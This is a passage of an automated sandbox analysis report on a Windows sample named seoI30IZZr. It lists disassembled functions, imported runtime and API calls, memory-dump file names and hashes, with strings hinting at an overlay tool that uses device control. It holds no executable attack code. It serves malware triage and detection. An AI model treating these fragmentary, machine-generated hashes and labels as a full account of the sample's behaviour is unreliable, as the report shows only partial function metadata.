                                                                                                                                                                        • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF786629958
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF786629977
                                                                                                                                                                        • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF7866299DB
                                                                                                                                                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF7866299E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: D@std@@@std@@U?$char_traits@memset$??1?$basic_ios@??1?$basic_istream@Concurrency::cancel_current_task
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 915423947-0
                                                                                                                                                                        • Opcode ID: afce2a08b22aa8ee083cf930a407ffbe3c27b8a17144efdd1399bdb0574eadc0
                                                                                                                                                                        • Instruction ID: 75dcd641d4a4ba72117ab7129f626883bfeec4eff88bbe34fa0f62fb4d0772bc
                                                                                                                                                                        • Opcode Fuzzy Hash: afce2a08b22aa8ee083cf930a407ffbe3c27b8a17144efdd1399bdb0574eadc0
                                                                                                                                                                        • Instruction Fuzzy Hash: E141C732B047C595EB14AB56E8403AAA352FB84BA4F644731DB6C077D5DF38D891CB11
                                                                                                                                                                        APIs
                                                                                                                                                                        • ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF786629D7A
                                                                                                                                                                        • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF786629D97
                                                                                                                                                                        • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF786629DC0
                                                                                                                                                                        • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF786629E0B
                                                                                                                                                                          • Part of subcall function 00007FF78662B0F0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B11D
                                                                                                                                                                          • Part of subcall function 00007FF78662B0F0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B137
                                                                                                                                                                          • Part of subcall function 00007FF78662B0F0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B169
                                                                                                                                                                          • Part of subcall function 00007FF78662B0F0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B194
                                                                                                                                                                          • Part of subcall function 00007FF78662B0F0: std::_Facet_Register.LIBCPMT ref: 00007FF78662B1AD
                                                                                                                                                                          • Part of subcall function 00007FF78662B0F0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B1CC
                                                                                                                                                                        • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF786629E20
                                                                                                                                                                        • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF786629E37
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3911317180-0
                                                                                                                                                                        • Opcode ID: aa924db88ae406aae9595ddd98dc093736adb0616978bee2f94a353b5b7a2f56
                                                                                                                                                                        • Instruction ID: 64071f3729f2e5cedbdc3ccb16507275dc9931aeea79b32f2f02e1610700b7f9
                                                                                                                                                                        • Opcode Fuzzy Hash: aa924db88ae406aae9595ddd98dc093736adb0616978bee2f94a353b5b7a2f56
                                                                                                                                                                        • Instruction Fuzzy Hash: D3315C32719B8192EB50AF26E94436AB3A6FB88F88F640135DE8D07754DF3CD845CB50
                                                                                                                                                                        APIs
                                                                                                                                                                        • __std_fs_code_page.MSVCPRT ref: 00007FF7866170AF
                                                                                                                                                                          • Part of subcall function 00007FF78662DA00: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF7866170B4), ref: 00007FF78662DA04
                                                                                                                                                                          • Part of subcall function 00007FF78662DA00: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7866170B4), ref: 00007FF78662DA13
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661722D
                                                                                                                                                                          • Part of subcall function 00007FF78662B5D0: memcpy.VCRUNTIME140(?,00000000,00000004,?,00007FF7866171FA), ref: 00007FF78662B6B2
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661727B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememcpy
                                                                                                                                                                        • String ID: ", "$: "
                                                                                                                                                                        • API String ID: 2077005984-747220369
                                                                                                                                                                        • Opcode ID: 274efefb0977a36c76b117e822037b346f289c8b0d12b5adda7fc53a25a5a156
                                                                                                                                                                        • Instruction ID: b572f822fa59293b00e756b6eec4c1f1850938b2b5cff72aa0156ee918acb06a
                                                                                                                                                                        • Opcode Fuzzy Hash: 274efefb0977a36c76b117e822037b346f289c8b0d12b5adda7fc53a25a5a156
                                                                                                                                                                        • Instruction Fuzzy Hash: 1961ADA2B04B80AAEB00EF65D9403AE6363FB48B98F504631DF5D17B89DF38D951C390
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: 8beb4a70d84814f3a84ad11d8969956394b205aa5d7a2c61af889b97717b44c7
                                                                                                                                                                        • Instruction ID: 6ee240699e5dfabcb022721c8efd8d9da765568002fd3c1b3c9d2920ce38ef60
                                                                                                                                                                        • Opcode Fuzzy Hash: 8beb4a70d84814f3a84ad11d8969956394b205aa5d7a2c61af889b97717b44c7
                                                                                                                                                                        • Instruction Fuzzy Hash: BA413832A0A781A6EA55AF51E94453AB3B1FF44F40FA85135CA4D43354EF3DEE41C760
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$free$malloc
                                                                                                                                                                        • String ID: ##Overlay
                                                                                                                                                                        • API String ID: 1393892039-3248624929
                                                                                                                                                                        • Opcode ID: 8b74354f79ebfd0c27580578c7ca65284e41158dec7fbec98600206e05b7cbbd
                                                                                                                                                                        • Instruction ID: 7f9f26ed1d2cd9bd6f1e81ece560911ce9d840e9f2c09354632755c38399fbb3
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b74354f79ebfd0c27580578c7ca65284e41158dec7fbec98600206e05b7cbbd
                                                                                                                                                                        • Instruction Fuzzy Hash: D322F332505BC189D310DF39E8441D977A9F745F68FAC433AEAA40B398DF34A4A1CB68
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: 6e92a617e146b79cb6626d2bcae5c049687a4346ba48f715e49b937383dfd172
                                                                                                                                                                        • Instruction ID: 176b65bc2bb060e9508895a45cd9756604468330049f4563d500c57d2559587a
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e92a617e146b79cb6626d2bcae5c049687a4346ba48f715e49b937383dfd172
                                                                                                                                                                        • Instruction Fuzzy Hash: 13314A32B0A681A5FE94AF52E94067AA3A1FF84F40FA85535CD4E43364DF2CED44CB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF78662957B
                                                                                                                                                                        • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF78662959A
                                                                                                                                                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7866295CC
                                                                                                                                                                        • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7866295E7
                                                                                                                                                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF786629633
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1830095303-0
                                                                                                                                                                        • Opcode ID: 1dad840c7d6ef9d326f5b0ea2094c75c2581b1eafbf6e81cf013dbac125aaab4
                                                                                                                                                                        • Instruction ID: 2eb8d4fbf8e26e358c5a07e8eb486fbfca29253c1ce4862aa00c7e8f0ed3fee6
                                                                                                                                                                        • Opcode Fuzzy Hash: 1dad840c7d6ef9d326f5b0ea2094c75c2581b1eafbf6e81cf013dbac125aaab4
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D317E32705B8191EB10DF26EA9472AB7A1FB45B89F548131CA4D43724CF39C86ACB40
                                                                                                                                                                        APIs
                                                                                                                                                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF786628803
                                                                                                                                                                        • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF786628822
                                                                                                                                                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF786628854
                                                                                                                                                                        • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF78662886F
                                                                                                                                                                          • Part of subcall function 00007FF786629D40: ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF786629D7A
                                                                                                                                                                          • Part of subcall function 00007FF786629D40: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF786629D97
                                                                                                                                                                          • Part of subcall function 00007FF786629D40: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF786629DC0
                                                                                                                                                                          • Part of subcall function 00007FF786629D40: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF786629E0B
                                                                                                                                                                          • Part of subcall function 00007FF786629D40: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF786629E20
                                                                                                                                                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7866288BB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2682282330-0
                                                                                                                                                                        • Opcode ID: 5c3eb3089c8e71072f5338f0a692fa3475058fbc56085c1773b47f7c1a0f9e87
                                                                                                                                                                        • Instruction ID: baf0ae56f04c809645f879ee0adaf145f16a83ac10854ee42df448642107f522
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c3eb3089c8e71072f5338f0a692fa3475058fbc56085c1773b47f7c1a0f9e87
                                                                                                                                                                        • Instruction Fuzzy Hash: EE215A32708B8292EB10DF25F95472AB7A5FB49B88F948135DA8D47768CF3DD409CB50
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ControlDevice$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID: NPC
                                                                                                                                                                        • API String ID: 2054765191-3492492454
                                                                                                                                                                        • Opcode ID: 1939a8b3d1a67aeb4469f3c21e14df6e84af20d113f364385093492c89facb07
                                                                                                                                                                        • Instruction ID: 2644628dadf6b6b8ba6f0e5d432fc1707380f694eeff5df4385a114d854291df
                                                                                                                                                                        • Opcode Fuzzy Hash: 1939a8b3d1a67aeb4469f3c21e14df6e84af20d113f364385093492c89facb07
                                                                                                                                                                        • Instruction Fuzzy Hash: 0061F272B05781AAEB00DF65E8403AE73A2FB44798F908635DE5D03B98DF38D955CB50
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID: Press Key$Select Key
                                                                                                                                                                        • API String ID: 2430190256-2074042277
                                                                                                                                                                        • Opcode ID: 38718c631a5cfa3e00e0affdcc8444de94284896ddde2a5a0e55baae332bcc17
                                                                                                                                                                        • Instruction ID: ab75fa0be815df84ea059bca0a046efa67f9220dd61da060d0caa384b3c039b6
                                                                                                                                                                        • Opcode Fuzzy Hash: 38718c631a5cfa3e00e0affdcc8444de94284896ddde2a5a0e55baae332bcc17
                                                                                                                                                                        • Instruction Fuzzy Hash: E931EAA1F186C151EB50AB14E84537BE712FB817A4FA05235EA5D066D9DF2CD884CF10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Context$CompositionReleaseWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 244372355-3916222277
                                                                                                                                                                        • Opcode ID: f6c38229c954742a0d5ac76e88cef7d873b25a87dc9533906f47dd598e62fb52
                                                                                                                                                                        • Instruction ID: bab8e45ec4471bdc6be66b8ff90c20b72cc25880c03083b781082e3935044cbf
                                                                                                                                                                        • Opcode Fuzzy Hash: f6c38229c954742a0d5ac76e88cef7d873b25a87dc9533906f47dd598e62fb52
                                                                                                                                                                        • Instruction Fuzzy Hash: C9015E75B09B8192EA60AF16F945266B3A1BB8CB94FA80135DE8C47714EF3CD844CB50
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                        • String ID: csm
                                                                                                                                                                        • API String ID: 2542180945-1018135373
                                                                                                                                                                        • Opcode ID: 8a473f447337ef945c40d2bb0789044ac61d4c89af2c61f0201678ab2b843443
                                                                                                                                                                        • Instruction ID: 7da222a270c2d187784390606386253c317b170f7d4339b787aec1a8e2ba5c22
                                                                                                                                                                        • Opcode Fuzzy Hash: 8a473f447337ef945c40d2bb0789044ac61d4c89af2c61f0201678ab2b843443
                                                                                                                                                                        • Instruction Fuzzy Hash: C7F04477605B80CAC310AF62EC800AD3366F789B88B9A5131FA4D47B59CF38C890CB21
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
